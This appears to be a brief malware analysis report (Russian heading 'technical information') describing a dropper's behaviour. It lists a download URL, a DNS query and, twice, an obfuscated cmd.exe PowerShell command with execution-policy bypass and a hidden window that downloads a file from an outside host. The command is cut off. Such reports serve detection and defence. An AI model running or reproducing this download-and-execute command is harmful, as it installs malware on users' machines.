Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^R^S^h^El^l^.ex^e -^e^XEc^UTI^ON^p^oL^I^cY b^ypA^SS -^NoProF^i^lE -w^iN^dOwStyLE^ hI^dd^en^ ^(NeW-obJe^c^T ^SYs^T^Em.NET.^w^Eb^CLI^ent^).Do^WNL^oAdfilE('http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "PoWe^R^S^h^El^l^.ex^e -^e^XEc^UTI^ON^p^oL^I^cY b^ypA^SS -^NoProF^i^lE -w^iN^dOwStyLE^ hI^dd^en^ ^(NeW-obJe^c^T ^SYs^T^Em.NET.^w^Eb^CLI^ent^).Do^WNL^oAdfilE('http://www.zonedopesa...' (со скрытым окном)